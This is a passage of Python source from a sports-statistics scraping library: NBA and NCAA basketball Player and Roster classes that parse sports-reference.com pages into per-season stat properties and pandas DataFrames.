return self._points
@_float_property_decorator
def player_efficiency_rating(self):
"""
Returns a ``float`` of the player's efficiency rating which represents
the player's relative production level. An average player in the league
has an efficiency rating of 15.
"""
return self._player_efficiency_rating
@_float_property_decorator
def true_shooting_percentage(self):
"""
Returns a ``float`` of the player's true shooting percentage which
takes into account two and three pointers as well as free throws.
Percentage ranges from 0-1.
"""
return self._true_shooting_percentage
@_float_property_decorator
def three_point_attempt_rate(self):
"""
Returns a ``float`` of the percentage of field goals that are shot from
beyond the 3-point arc. Percentage ranges from 0-1.
"""
return self._three_point_attempt_rate
@_float_property_decorator
def free_throw_attempt_rate(self):
"""
Returns a ``float`` of the number of free throw attempts per field goal
attempt.
"""
return self._free_throw_attempt_rate
@_float_property_decorator
def offensive_rebound_percentage(self):
"""
Returns a ``float`` of the percentage of available offensive rebounds
the player grabbed. Percentage ranges from 0-100.
"""
return self._offensive_rebound_percentage
@_float_property_decorator
def defensive_rebound_percentage(self):
"""
Returns a ``float`` of the percentage of available defensive rebounds
the player grabbed. Percentage ranges from 0-100.
"""
return self._defensive_rebound_percentage
@_float_property_decorator
def total_rebound_percentage(self):
"""
Returns a ``float`` of the percentage of available rebounds the player
grabbed, both offensive and defensive. Percentage ranges from 0-100.
"""
return self._total_rebound_percentage
@_float_property_decorator
def assist_percentage(self):
"""
Returns a ``float`` of the percentage of field goals the player
assisted while on the floor. Percentage ranges from 0-100.
"""
return self._assist_percentage
@_float_property_decorator
def steal_percentage(self):
"""
Returns a ``float`` of the percentage of defensive possessions that
ended with the player stealing the ball while on the floor. Percentage
ranges from 0-100.
"""
return self._steal_percentage
@_float_property_decorator
def block_percentage(self):
"""
Returns a ``float`` of the percentage of opposing two-point field goal
attempts that were blocked by the player while on the floor. Percentage
ranges from 0-100.
"""
return self._block_percentage
@_float_property_decorator
def turnover_percentage(self):
"""
Returns a ``float`` of the average number of turnovers per 100
possessions by the player.
"""
return self._turnover_percentage
@_float_property_decorator
def usage_percentage(self):
"""
Returns a ``float`` of the percentage of plays the player is involved
in while on the floor. Percentage ranges from 0-100.
"""
return self._usage_percentage
@_float_property_decorator
def offensive_win_shares(self):
"""
Returns a ``float`` of the number of wins the player contributed to the
team as a result of his offensive plays.
"""
return self._offensive_win_shares
@_float_property_decorator
def defensive_win_shares(self):
"""
Returns a ``float`` of the number of wins the player contributed to the
team as a result of his defensive plays.
"""
return self._defensive_win_shares
@_float_property_decorator
def win_shares(self):
"""
Returns a ``float`` of the number of wins the player contributed to the
team as a result of his offensive and defensive plays.
"""
return self._win_shares
@_float_property_decorator
def win_shares_per_48_minutes(self):
"""
Returns a ``float`` of the number of wins the player contributed to the
team per 48 minutes of playtime. An average player has a contribution
of 0.100.
"""
return self._win_shares_per_48_minutes
@_float_property_decorator
def offensive_box_plus_minus(self):
"""
Returns a ``float`` of the number of offensive points per 100
possessions the player contributed in comparison to an average player
in the league.
"""
return self._offensive_box_plus_minus
@_float_property_decorator
def defensive_box_plus_minus(self):
"""
Returns a ``float`` of the number of defensive points per 100
possessions the player contributed in comparison to an average player
in the league.
"""
return self._defensive_box_plus_minus
@_float_property_decorator
def box_plus_minus(self):
"""
Returns a ``float`` of the total number of points per 100 possessions
the player contributed in comparison to an average player in the
league.
"""
return self._box_plus_minus
@_float_property_decorator
def value_over_replacement_player(self):
"""
Returns a ``float`` of the total number of points per 100 team
possessions the player contributed compared to a replacement-level
player (who has an average score of -2.0). This value is prorated for
an 82-game season.
"""
return self._value_over_replacement_player
@_float_property_decorator
def shooting_distance(self):
"""
Returns a ``float`` of the average distance, in feet, from which the
player takes a shot.
"""
return self._shooting_distance
@_float_property_decorator
def percentage_shots_two_pointers(self):
"""
Returns a ``float`` of the percentage of shots the player takes that
are 2-pointers. Percentage ranges from 0-1.
"""
return self._percentage_shots_two_pointers
@_float_property_decorator
def percentage_zero_to_three_footers(self):
"""
Returns a ``float`` of the percentage of shots the player takes from
zero to three feet from the basket. Percentage ranges from 0-1.
"""
return self._percentage_zero_to_three_footers
@_float_property_decorator
def percentage_three_to_ten_footers(self):
"""
Returns a ``float`` of the percentage of shots the player takes from
three to ten feet from the basket. Percentage ranges from 0-1.
"""
return self._percentage_three_to_ten_footers
@_float_property_decorator
def percentage_ten_to_sixteen_footers(self):
"""
Returns a ``float`` of the percentage of shots the player takes from
ten to sixteen feet from the basket. Percentage ranges from 0-1.
"""
return self._percentage_ten_to_sixteen_footers
@_float_property_decorator
def percentage_sixteen_foot_plus_two_pointers(self):
"""
Returns a ``float`` of the percentage of shots the player takes that
are greater than sixteen feet from the basket, but in front of or on
the three point arc. Percentage ranges from 0-1.
"""
return self._percentage_sixteen_foot_plus_two_pointers
@_float_property_decorator
def percentage_shots_three_pointers(self):
"""
Returns a ``float`` of the percentage of shots the player takes from
beyond the three point arc. Percentage ranges from 0-1.
"""
return self._percentage_shots_three_pointers
@_float_property_decorator
def field_goal_perc_zero_to_three_feet(self):
"""
Returns a ``float`` of the player's field goal percentage for shots
between zero and three feet from the basket. Percentage ranges from
0-1.
"""
return self._field_goal_perc_zero_to_three_feet
@_float_property_decorator
def field_goal_perc_three_to_ten_feet(self):
"""
Returns a ``float`` of the player's field goal percentage for shots
between three and ten feet from the basket. Percentage ranges from
0-1.
"""
return self._field_goal_perc_three_to_ten_feet
@_float_property_decorator
def field_goal_perc_ten_to_sixteen_feet(self):
"""
Returns a ``float`` of the player's field goal percentage for shots
between ten and sixteen feet from the basket. Percentage ranges from
0-1.
"""
return self._field_goal_perc_ten_to_sixteen_feet
@_float_property_decorator
def field_goal_perc_sixteen_foot_plus_two_pointers(self):
"""
Returns a ``float`` of the player's field goal percentage for shots
that are greater than sixteen feet from the basket, but in front
of or on the three point arc. Percentage ranges from 0-1.
"""
return self._field_goal_perc_sixteen_foot_plus_two_pointers
@_float_property_decorator
def two_pointers_assisted_percentage(self):
"""
Returns a ``float`` of the percentage of 2-point field goals by the
player that are assisted. Percentage ranges from 0-1.
"""
return self._two_pointers_assisted_percentage
@_float_property_decorator
def percentage_field_goals_as_dunks(self):
"""
Returns a ``float`` of the percentage of the player's shot attempts
that are dunks. Percentage ranges from 0-1.
"""
return self._percentage_field_goals_as_dunks
@_int_property_decorator
def dunks(self):
"""
Returns an ``int`` of the total number of dunks the player made during
the season.
"""
return self._dunks
@_float_property_decorator
def three_pointers_assisted_percentage(self):
"""
Returns a ``float`` of the percentage of 3-point field goals by the
player that are assisted. Percentage ranges from 0-1.
"""
return self._three_pointers_assisted_percentage
@_float_property_decorator
def percentage_of_three_pointers_from_corner(self):
"""
Returns a ``float`` of the percentage of 3-point shots the player
attempted from the corner. Percentage ranges from 0-1.
"""
return self._percentage_of_three_pointers_from_corner
@_float_property_decorator
def three_point_shot_percentage_from_corner(self):
"""
Returns a ``float`` of the percentage of 3-pointers from the corner
that went in. Percentage ranges from 0-1.
"""
return self._three_point_shot_percentage_from_corner
@_int_property_decorator
def half_court_heaves(self):
"""
Returns an ``int`` of the number of shots the player took from beyond
mid-court.
"""
return self._half_court_heaves
@_int_property_decorator
def half_court_heaves_made(self):
"""
Returns an ``int`` of the number of shots the player made from beyond
mid-court.
"""
return self._half_court_heaves_made
@_int_property_decorator_default_zero
def point_guard_percentage(self):
"""
Returns an ``int`` of the percentage of time the player spent as a
point guard. Percentage ranges from 0-100 and is rounded to the
nearest whole number.
"""
return self._point_guard_percentage
@_int_property_decorator_default_zero
def shooting_guard_percentage(self):
"""
Returns an ``int`` of the percentage of time the player spent as a
shooting guard. Percentage ranges from 0-100 and is rounded to the
nearest whole number.
"""
return self._shooting_guard_percentage
@_int_property_decorator_default_zero
def small_forward_percentage(self):
"""
Returns an ``int`` of the percentage of time the player spent as a
small forward. Percentage ranges from 0-100 and is rounded to the
nearest whole number.
"""
return self._small_forward_percentage
@_int_property_decorator_default_zero
def power_forward_percentage(self):
"""
Returns an ``int`` of the percentage of time the player spent as a
power forward. Percentage ranges from 0-100 and is rounded to the
nearest whole number.
"""
return self._power_forward_percentage
@_int_property_decorator_default_zero
def center_percentage(self):
"""
Returns an ``int`` of the percentage of time the player spent as a
center. Percentage ranges from 0-100 and is rounded to the nearest
whole number.
"""
return self._center_percentage
@_float_property_decorator
def on_court_plus_minus(self):
"""
Returns a ``float`` of the number of points the player contributes to
the team while on the court per 100 possessions.
"""
return self._on_court_plus_minus
@_float_property_decorator
def net_plus_minus(self):
"""
Returns a ``float`` of the net number of points the player contributes
to the team per 100 possessions regardless of being on the floor or
not.
"""
return self._net_plus_minus
@_int_property_decorator
def passing_turnovers(self):
"""
Returns an ``int`` of the total number of turnovers the player
committed due to a bad pass.
"""
return self._passing_turnovers
@_int_property_decorator
def lost_ball_turnovers(self):
"""
Returns an ``int`` of the total number of turnovers the player
committed due to losing the ball.
"""
return self._lost_ball_turnovers
@_int_property_decorator
def other_turnovers(self):
"""
Returns an ``int`` of the total number of all other non-passing/
dribbling turnovers the player committed.
"""
return self._other_turnovers
@_int_property_decorator
def shooting_fouls(self):
"""
Returns an ``int`` of the total number of shooting fouls the player
committed.
"""
return self._shooting_fouls
@_int_property_decorator
def blocking_fouls(self):
"""
Returns an ``int`` of the total number of blocking fouls the player
committed.
"""
return self._blocking_fouls
@_int_property_decorator
def offensive_fouls(self):
"""
Returns an ``int`` of the total number of offensive fouls the player
committed.
"""
return self._offensive_fouls
@_int_property_decorator
def take_fouls(self):
"""
Returns an ``int`` of the total number of take fouls the player
committed by taking a foul before the offensive player has a chance to
make a shooting motion.
"""
return self._take_fouls
@_int_property_decorator
def points_generated_by_assists(self):
"""
Returns an ``int`` of the total number of points the player generated
as a result of him assisting the shooter.
"""
return self._points_generated_by_assists
@_int_property_decorator
def shooting_fouls_drawn(self):
"""
Returns an ``int`` of the total number of shooting fouls the player
drew during the season.
"""
return self._shooting_fouls_drawn
@_int_property_decorator
def and_ones(self):
"""
Returns an ``int`` of the total number of times the player was fouled
in the act of shooting and made the basket.
"""
return self._and_ones
@_int_property_decorator
def shots_blocked(self):
"""
Returns an ``int`` of the total number of shots the player took that
were blocked by an opposing player.
"""
return self._shots_blocked
@_int_property_decorator
def salary(self):
"""
Returns an ``int`` of the player's annual salary rounded down.
"""
return self._salary
@property
def contract(self):
"""
Returns a ``dictionary`` of the player's contract details where the key
is a ``string`` of the season, such as '2018-19', and the value is a
``string`` of the salary, such as '$40,000,000'.
"""
return self._contract
class Roster(object):
"""
Get stats for all players on a roster.
Request a team's roster for a given season and create an instance of the
Player class for each player, containing a detailed list of the player's
statistics and information.
Parameters
----------
team : string
The team's 3-letter abbreviation, such as 'HOU' for the Houston
Rockets.
year : string (optional)
The 4-digit year to pull the roster from, such as '2018'. If left
blank, defaults to the most recent season.
"""
def __init__(self, team, year=None):
self._team = team
self._players = []
self._find_players(year)
def _pull_team_page(self, url):
"""
Download the team page.
Download the requested team's season page and create a PyQuery object.
Parameters
----------
url : string
A string of the built URL for the requested team and season.
Returns
-------
PyQuery object
Returns a PyQuery object of the team's HTML page.
"""
try:
return pq(url)
except HTTPError:
return None
def _create_url(self, year):
"""
Build the team URL.
Build a URL given a team's 3-letter abbreviation and the 4-digit year.
Parameters
----------
year : string
The 4-digit string representing the year to pull the team's roster
from.
Returns
-------
string
Returns a string of the team's season page for the requested team
and year.
"""
return ROSTER_URL % (self._team.upper(), year)
def _get_id(self, player):
"""
Parse the player ID.
Given a PyQuery object representing a single player on the team roster,
parse the player ID and return it as a string.
Parameters
----------
player : PyQuery object
A PyQuery object representing the player information from the
roster table.
Returns
-------
string
Returns a string of the player ID.
"""
name_tag = player('td[data-stat="player"] a')
name = re.sub(r'.*/players/./', '', str(name_tag))
return re.sub(r'\.html.*', '', name)
def _find_players(self, year):
"""
Find all player IDs for the requested team.
For the requested team and year (if applicable), pull the roster table
and parse the player ID for all players on the roster and create an
instance of the Player class for the player. All player instances are
added to the 'players' property to get all stats for all players on a
team.
Parameters
----------
year : string
The 4-digit string representing the year to pull the team's roster
from.
"""
if not year:
year = utils._find_year_for_season('nba')
url = self._create_url(year)
page = self._pull_team_page(url)
if not page:
output = ("Can't pull requested team page. Ensure the following "
"URL exists: %s" % url)
raise ValueError(output)
players = page('table#roster tbody tr').items()
for player in players:
player_id = self._get_id(player)
player_instance = Player(player_id)
self._players.append(player_instance)
@property
def players(self):
"""
Returns a ``list`` of player instances for each player on the requested
team's roster.
"""
return self._players
```
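A minimal usage sketch for the `Player` and `Roster` classes above. The import path is an assumption based on the file headers used in this document, the calls require sports-reference.com to be reachable, and the identifiers come from the docstrings above.
```python
from sportsreference.nba.roster import Player, Roster

player = Player('hardeja01')         # career stats by default
print(player.name, player.points)    # career point total
print(player('2017-18').points)      # points for a single season
print(player.dataframe)              # one row per season plus 'Career'

roster = Roster('HOU')               # defaults to the most recent season
for team_member in roster.players:
    print(team_member.name)
```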
#### File: sportsreference/ncaab/roster.py
```python
import pandas as pd
import re
from functools import wraps
from pyquery import PyQuery as pq
from .. import utils
from .constants import PLAYER_SCHEME, PLAYER_URL, ROSTER_URL
from six.moves.urllib.error import HTTPError
def _cleanup(prop):
try:
prop = prop.replace('%', '')
prop = prop.replace(',', '')
return prop.replace('+', '')
# Occurs when a value is of NoneType. When that happens, return a blank
# string, as whatever came in had an incomplete value.
except AttributeError:
return ''
def _int_property_decorator(func):
@property
@wraps(func)
def wrapper(*args):
index = args[0]._index
prop = func(*args)
value = _cleanup(prop[index])
try:
return int(value)
except ValueError:
# If there is no value, default to None
return None
return wrapper
def _float_property_decorator(func):
@property
@wraps(func)
def wrapper(*args):
index = args[0]._index
prop = func(*args)
value = _cleanup(prop[index])
try:
return float(value)
except ValueError:
# If there is no value, default to None
return None
return wrapper
def _most_recent_decorator(func):
@property
@wraps(func)
def wrapper(*args):
season = args[0]._most_recent_season
seasons = args[0]._season
index = seasons.index(season)
prop = func(*args)
return prop[index]
return wrapper
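# The decorators above share a pattern: every stat attribute is stored as a
# per-season list. _int_property_decorator and _float_property_decorator
# clean and cast the value for the season currently selected by _index,
# returning None when the cell is empty, while _most_recent_decorator always
# returns the value from the player's most recent season.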
class Player(object):
"""
Get player information and stats for all seasons.
Given a player ID, such as 'carsen-edwards-1' for Carsen Edwards, capture
all relevant stats and information like name, height/weight, career
three-pointers, last season's offensive rebounds, offensive points
contributed, and much more.
By default, the class instance will return the player's career stats, but
single-season stats can be found by calling the instance with the requested
season as denoted on sports-reference.com.
Parameters
----------
player_id : string
A player's ID according to sports-reference.com, such as
'carsen-edwards-1' for Carsen Edwards. The player ID can be found by
navigating to the player's stats page and getting the string between
the final slash and the '.html' in the URL. In general, the ID is in
the format 'first-last-N' where 'first' is the player's first name in
lowercase, 'last' is the player's last name in lowercase, and 'N' is a
number starting at '1' for the first time that player ID has been used
and increments by 1 for every successive player.
"""
def __init__(self, player_id):
self._most_recent_season = ''
self._index = None
self._player_id = player_id
self._season = None
self._name = None
self._team_abbreviation = None
self._conference = None
self._position = None
self._height = None
self._weight = None
self._games_played = None
self._games_started = None
self._minutes_played = None
self._field_goals = None
self._field_goal_attempts = None
self._field_goal_percentage = None
self._three_pointers = None
self._three_point_attempts = None
self._three_point_percentage = None
self._two_pointers = None
self._two_point_attempts = None
self._two_point_percentage = None
self._free_throws = None
self._free_throw_attempts = None
self._free_throw_percentage = None
self._offensive_rebounds = None
self._defensive_rebounds = None
self._total_rebounds = None
self._assists = None
self._steals = None
self._blocks = None
self._turnovers = None
self._personal_fouls = None
self._points = None
self._player_efficiency_rating = None
self._true_shooting_percentage = None
self._effective_field_goal_percentage = None
self._three_point_attempt_rate = None
self._free_throw_attempt_rate = None
self._points_produced = None
self._offensive_rebound_percentage = None
self._defensive_rebound_percentage = None
self._total_rebound_percentage = None
self._assist_percentage = None
self._steal_percentage = None
self._block_percentage = None
self._turnover_percentage = None
self._usage_percentage = None
self._offensive_win_shares = None
self._defensive_win_shares = None
self._win_shares = None
self._win_shares_per_40_minutes = None
self._offensive_box_plus_minus = None
self._defensive_box_plus_minus = None
self._box_plus_minus = None
self._parse_player_data()
self._find_initial_index()
def _retrieve_html_page(self):
"""
Download the requested player's stats page.
Download the requested page and strip all of the comment tags before
returning a pyquery object which will be used to parse the data.
Returns
-------
PyQuery object
The requested page is returned as a queriable PyQuery object with
the comment tags removed.
"""
url = PLAYER_URL % self._player_id
try:
url_data = pq(url)
except HTTPError:
return None
return pq(utils._remove_html_comment_tags(url_data))
def _parse_season(self, row):
"""
Parse the season string from the table.
The season is generally located in the first column of the stats tables
and should be parsed to denote which season metrics are being pulled
from.
Parameters
----------
row : PyQuery object
A PyQuery object of a single row in a stats table.
Returns
-------
string
A string representation of the season in the format 'YYYY-YY', such
as '2017-18'.
"""
return utils._parse_field(PLAYER_SCHEME, row, 'season')
def _combine_season_stats(self, table_rows, career_stats, all_stats_dict):
"""
Combine all stats for each season.
Since all of the stats are spread across multiple tables, they should
be combined into a single field which can be used to easily query stats
at once.
Parameters
----------
table_rows : generator
A generator where each element is a row in a stats table.
career_stats : generator
A generator where each element is a row in the footer of a stats
table. Career stats are kept in the footer, hence the usage.
all_stats_dict : dictionary
A dictionary of all stats separated by season where each key is the
season ``string``, such as '2017-18', and the value is a
``dictionary`` with a ``string`` of 'data' and ``string``
containing all of the data.
Returns
-------
dictionary
Returns an updated version of the passed all_stats_dict which
includes more metrics from the provided table.
"""
most_recent_season = ''
for row in table_rows:
season = self._parse_season(row)
try:
all_stats_dict[season]['data'] += str(row)
except KeyError:
all_stats_dict[season] = {'data': str(row)}
most_recent_season = season
self._most_recent_season = most_recent_season
try:
all_stats_dict['career']['data'] += str(next(career_stats))
except KeyError:
all_stats_dict['career'] = {'data': str(next(career_stats))}
return all_stats_dict
def _combine_all_stats(self, player_info):
"""
Pull stats from all tables into single data structure.
Pull the stats from all of the requested tables into a dictionary that
is separated by season to allow easy queries of the player's stats for
each season.
Parameters
----------
player_info : PyQuery object
A PyQuery object containing all of the stats information for the
requested player.
Returns
-------
dictionary
Returns a dictionary where all stats from each table are combined
by season to allow easy queries by year.
"""
all_stats_dict = {}
for table_id in ['players_totals', 'players_advanced']:
table_items = utils._get_stats_table(player_info,
'table#%s' % table_id)
career_items = utils._get_stats_table(player_info,
'table#%s' % table_id,
footer=True)
all_stats_dict = self._combine_season_stats(table_items,
career_items,
all_stats_dict)
return all_stats_dict
def _parse_player_information(self, player_info, field):
"""
Parse general player information.
Parse general player information such as height and weight. The
attribute for the requested field will be set with the value prior to
returning.
Parameters
----------
player_info : PyQuery object
A PyQuery object containing the HTML from the player's stats page.
field : string
A string of the attribute to parse, such as 'weight'.
"""
short_field = str(field)[1:]
value = utils._parse_field(PLAYER_SCHEME, player_info, short_field)
setattr(self, field, value)
def _parse_player_position(self, player_info):
"""
Parse the player's position.
The player's position isn't contained within a unique tag and the
player's meta information should be iterated through until 'Position'
is found as it contains the desired text.
Parameters
----------
player_info : PyQuery object
A PyQuery object of the player's information on the HTML stats
page.
Returns
-------
string
Returns a string of the player's position, such as 'Guard'.
"""
for section in player_info('div#meta p').items():
if 'Position' in str(section):
return section.text().replace('Position: ', '')
def _parse_conference(self, stats):
"""
Parse the conference abbreviation for the player's team.
The conference abbreviation is embedded within the conference name tag
and should be special-parsed to extract it.
Parameters
----------
stats : PyQuery object
A PyQuery object containing the HTML from the player's stats page.
Returns
-------
string
Returns a string of the conference abbreviation, such as 'big-12'.
"""
conference_tag = stats(PLAYER_SCHEME['conference'])
conference = re.sub(r'.*/cbb/conferences/',
'',
str(conference_tag('a')))
conference = re.sub(r'/.*', '', conference)
return conference
def _parse_team_abbreviation(self, stats):
"""
Parse the team abbreviation.
The team abbreviation is embedded within the team name tag and should
be special-parsed to extract it.
Parameters
----------
stats : PyQuery object
A PyQuery object containing the HTML from the player's stats page.
Returns
-------
string
Returns a string of the team's abbreviation, such as 'PURDUE' for
the Purdue Boilermakers.
"""
team_tag = stats(PLAYER_SCHEME['team_abbreviation'])
team = re.sub(r'.*/cbb/schools/', '', str(team_tag('a')))
team = re.sub(r'/.*', '', team)
return team
def _parse_player_data(self):
"""
Parse all player information and set attributes.
Pull the player's HTML stats page and go through each class attribute
to parse the data from the HTML page and set attribute value with the
result.
"""
player_info = self._retrieve_html_page()
all_stats_dict = self._combine_all_stats(player_info)
for field in self.__dict__:
short_field = str(field)[1:]
if short_field == 'player_id' or \
short_field == 'index' or \
short_field == 'most_recent_season':
continue
if short_field == 'name' or \
short_field == 'weight' or \
short_field == 'height':
self._parse_player_information(player_info, field)
continue
if short_field == 'position':
value = self._parse_player_position(player_info)
setattr(self, field, value)
continue
field_stats = []
for year, data in all_stats_dict.items():
stats = pq(data['data'])
if short_field == 'conference':
value = self._parse_conference(stats)
elif short_field == 'team_abbreviation':
value = self._parse_team_abbreviation(stats)
else:
value = utils._parse_field(PLAYER_SCHEME,
stats,
short_field)
field_stats.append(value)
setattr(self, field, field_stats)
def _find_initial_index(self):
"""
Find the index of career stats.
When the Player class is instantiated, the default stats to pull are
the player's career stats. Upon being called, the index of the 'Career'
element should be the index value.
"""
index = 0
for season in self._season:
if season == 'Career':
self._index = index
break
index += 1
def __call__(self, requested_season=''):
"""
Specify a different season to pull stats from.
A different season can be requested by passing the season string, such
as '2017-18' to the class instance.
Parameters
----------
requested_season : string (optional)
A string of the requested season to query, such as '2017-18'. If
left blank or 'Career' is passed, the career stats will be used for
stats queries.
Returns
-------
Player class instance
Returns the class instance with the updated stats being referenced.
"""
if requested_season.lower() == 'career' or \
requested_season == '':
requested_season = 'Career'
index = 0
for season in self._season:
if season == requested_season:
self._index = index
break
index += 1
return self
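# A short usage sketch (as comments, since this sits inside the class):
#   edwards = Player('carsen-edwards-1')
#   edwards('2017-18').points  -> points scored in the 2017-18 season
#   edwards('Career').points   -> career point total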
def _dataframe_fields(self):
"""
Creates a dictionary of all fields to include with DataFrame.
With the result of the calls to class properties changing based on the
class index value, the dictionary should be regenerated every time the
index is changed when the dataframe property is requested.
Returns
-------
dictionary
Returns a dictionary where the keys are the shortened ``string``
attribute names and the values are the actual value for each
attribute for the specified index.
"""
fields_to_include = {
'assist_percentage': self.assist_percentage,
'assists': self.assists,
'block_percentage': self.block_percentage,
'blocks': self.blocks,
'box_plus_minus': self.box_plus_minus,
'conference': self.conference,
'defensive_box_plus_minus': self.defensive_box_plus_minus,
'defensive_rebound_percentage': self.defensive_rebound_percentage,
'defensive_rebounds': self.defensive_rebounds,
'defensive_win_shares': self.defensive_win_shares,
'effective_field_goal_percentage':
self.effective_field_goal_percentage,
'field_goal_attempts': self.field_goal_attempts,
'field_goal_percentage': self.field_goal_percentage,
'field_goals': self.field_goals,
'free_throw_attempt_rate': self.free_throw_attempt_rate,
'free_throw_attempts': self.free_throw_attempts,
'free_throw_percentage': self.free_throw_percentage,
'free_throws': self.free_throws,
'games_played': self.games_played,
'games_started': self.games_started,
'height': self.height,
'minutes_played': self.minutes_played,
'offensive_box_plus_minus': self.offensive_box_plus_minus,
'offensive_rebound_percentage': self.offensive_rebound_percentage,
'offensive_rebounds': self.offensive_rebounds,
'offensive_win_shares': self.offensive_win_shares,
'personal_fouls': self.personal_fouls,
'player_efficiency_rating': self.player_efficiency_rating,
'player_id': self.player_id,
'points': self.points,
'points_produced': self.points_produced,
'position': self.position,
'steal_percentage': self.steal_percentage,
'steals': self.steals,
'team_abbreviation': self.team_abbreviation,
'three_point_attempt_rate': self.three_point_attempt_rate,
'three_point_attempts': self.three_point_attempts,
'three_point_percentage': self.three_point_percentage,
'three_pointers': self.three_pointers,
'total_rebound_percentage': self.total_rebound_percentage,
'total_rebounds': self.total_rebounds,
'true_shooting_percentage': self.true_shooting_percentage,
'turnover_percentage': self.turnover_percentage,
'turnovers': self.turnovers,
'two_point_attempts': self.two_point_attempts,
'two_point_percentage': self.two_point_percentage,
'two_pointers': self.two_pointers,
'usage_percentage': self.usage_percentage,
'weight': self.weight,
'win_shares': self.win_shares,
'win_shares_per_40_minutes': self.win_shares_per_40_minutes,
}
return fields_to_include
@property
def dataframe(self):
"""
Returns a ``pandas DataFrame`` containing all other relevant class
properties and values where each index is a different season plus the
career stats.
"""
temp_index = self._index
rows = []
indices = []
for season in self._season:
self._index = self._season.index(season)
rows.append(self._dataframe_fields())
indices.append(season)
self._index = temp_index
return pd.DataFrame(rows, index=[indices])
@property
def player_id(self):
"""
Returns a ``string`` of the player's ID on sports-reference, such as
'carsen-edwards-1' for <NAME>.
"""
return self._player_id
@property
def season(self):
"""
Returns a ``string`` of the season in the format 'YYYY-YY', such as
'2017-18'. If no season was requested, the career stats will be
returned for the player and the season will default to 'Career'.
"""
return self._season[self._index]
@property
def conference(self):
"""
Returns a ``string`` of the abbreviation for the conference the team
participated in for the requested season.
"""
return self._conference[self._index]
@property
def name(self):
"""
Returns a ``string`` of the player's name, such as '<NAME>'.
"""
return self._name
@_most_recent_decorator
def team_abbreviation(self):
"""
Returns a ``string`` of the abbreviation for the team the player plays
for, such as 'PURDUE' for Carsen Edwards.
"""
return self._team_abbreviation
@property
def position(self):
"""
Returns a ``string`` constant of the player's primary position.
"""
return self._position
@property
def height(self):
"""
Returns a ``string`` of the player's height in the format
"feet-inches".
"""
return self._height
@property
def weight(self):
"""
Returns an ``int`` of the player's weight in pounds.
"""
return int(self._weight.replace('lb', ''))
@_int_property_decorator
def games_played(self):
"""
Returns an ``int`` of the number of games the player participated in.
"""
return self._games_played
@_int_property_decorator
def games_started(self):
"""
Returns an ``int`` of the number of games the player started.
"""
return self._games_started
@_int_property_decorator
def minutes_played(self):
"""
Returns an ``int`` of the total number of minutes the player played.
"""
return self._minutes_played
@_int_property_decorator
def field_goals(self):
"""
Returns an ``int`` of the total number of field goals the player
scored.
"""
return self._field_goals
@_int_property_decorator
def field_goal_attempts(self):
"""
Returns an ``int`` of the total number of field goals the player
attempted during the season.
"""
return self._field_goal_attempts
@_float_property_decorator
def field_goal_percentage(self):
"""
Returns a ``float`` of the player's field goal percentage during the
season. Percentage ranges from 0-1.
"""
return self._field_goal_percentage
@_int_property_decorator
def three_pointers(self):
"""
Returns an ``int`` of the total number of three point field goals the
player made.
"""
return self._three_pointers
@_int_property_decorator
def three_point_attempts(self):
"""
Returns an ``int`` of the total number of three point field goals the
player attempted during the season.
"""
return self._three_point_attempts
@_float_property_decorator
def three_point_percentage(self):
"""
Returns a ``float`` of the player's three point field goal percentage
during the season. Percentage ranges from 0-1.
"""
return self._three_point_percentage
@_int_property_decorator
def two_pointers(self):
"""
Returns an ``int`` of the total number of two point field goals the
player made.
"""
return self._two_pointers
@_int_property_decorator
def two_point_attempts(self):
"""
Returns an ``int`` of the total number of two point field goals the
player attempted during the season.
"""
return self._two_point_attempts
@_float_property_decorator
def two_point_percentage(self):
"""
Returns a ``float`` of the player's two point field goal percentage
during the season. Percentage ranges from 0-1.
"""
return self._two_point_percentage
@_float_property_decorator
def effective_field_goal_percentage(self):
"""
Returns a ``float`` of the player's field goal percentage while giving
extra weight to 3-point field goals. Percentage ranges from 0-1.
"""
return self._effective_field_goal_percentage
@_int_property_decorator
def free_throws(self):
"""
Returns an ``int`` of the total number of free throws the player made
during the season.
"""
return self._free_throws
@_int_property_decorator
def free_throw_attempts(self):
"""
Returns an ``int`` of the total number of free throws the player
attempted during the season.
"""
return self._free_throw_attempts
@_float_property_decorator
def free_throw_percentage(self):
"""
Returns a ``float`` of the player's free throw percentage during the
season. Percentage ranges from 0-1.
"""
return self._free_throw_percentage
@_int_property_decorator
def offensive_rebounds(self):
"""
Returns an ``int`` of the total number of offensive rebounds the player
grabbed during the season.
"""
return self._offensive_rebounds
@_int_property_decorator
def defensive_rebounds(self):
"""
Returns an ``int`` of the total number of defensive rebounds the player
grabbed during the season.
"""
return self._defensive_rebounds
@_int_property_decorator
def total_rebounds(self):
"""
Returns an ``int`` of the total number of offensive and defensive
rebounds the player grabbed during the season.
"""
return self._total_rebounds
@_int_property_decorator
def assists(self):
"""
Returns an ``int`` of the total number of assists the player tallied
during the season.
"""
return self._assists
@_int_property_decorator
def steals(self):
"""
Returns an ``int`` of the total number of steals the player tallied
during the season.
"""
return self._steals
@_int_property_decorator
def blocks(self):
"""
Returns an ``int`` of the total number of shots the player blocked
during the season.
"""
return self._blocks
@_int_property_decorator
def turnovers(self):
"""
Returns an ``int`` of the total number of times the player turned the
ball over during the season for any reason.
"""
return self._turnovers
@_int_property_decorator
def personal_fouls(self):
"""
Returns an ``int`` of the total number of personal fouls the player
committed during the season.
"""
return self._personal_fouls
@_int_property_decorator
def points(self):
"""
Returns an ``int`` of the total number of points the player scored
during the season.
"""
return self._points
@_float_property_decorator
def player_efficiency_rating(self):
"""
Returns a ``float`` of the player's efficiency rating which represents
the player's relative production level. An average player in the league
has an efficiency rating of 15.
"""
return self._player_efficiency_rating
@_float_property_decorator
def true_shooting_percentage(self):
"""
Returns a ``float`` of the player's true shooting percentage which
takes into account two and three pointers as well as free throws.
Percentage ranges from 0-1.
"""
return self._true_shooting_percentage
@_float_property_decorator
def three_point_attempt_rate(self):
"""
Returns a ``float`` of the percentage of field goals that are shot from
beyond the 3-point arc. Percentage ranges from 0-1.
"""
return self._three_point_attempt_rate
@_float_property_decorator
def free_throw_attempt_rate(self):
"""
Returns a ``float`` of the number of free throw attempts per field goal
attempt.
"""
return self._free_throw_attempt_rate
@_int_property_decorator
def points_produced(self):
"""
Returns an ``int`` of the number of offensive points the player
produced.
"""
return self._points_produced
@_float_property_decorator
def offensive_rebound_percentage(self):
"""
Returns a ``float`` of the percentage of available offensive rebounds
the player grabbed. Percentage ranges from 0-100.
"""
return self._offensive_rebound_percentage
@_float_property_decorator
def defensive_rebound_percentage(self):
"""
Returns a ``float`` of the percentage of available defensive rebounds
the player grabbed. Percentage ranges from 0-100.
"""
return self._defensive_rebound_percentage
@_float_property_decorator
def total_rebound_percentage(self):
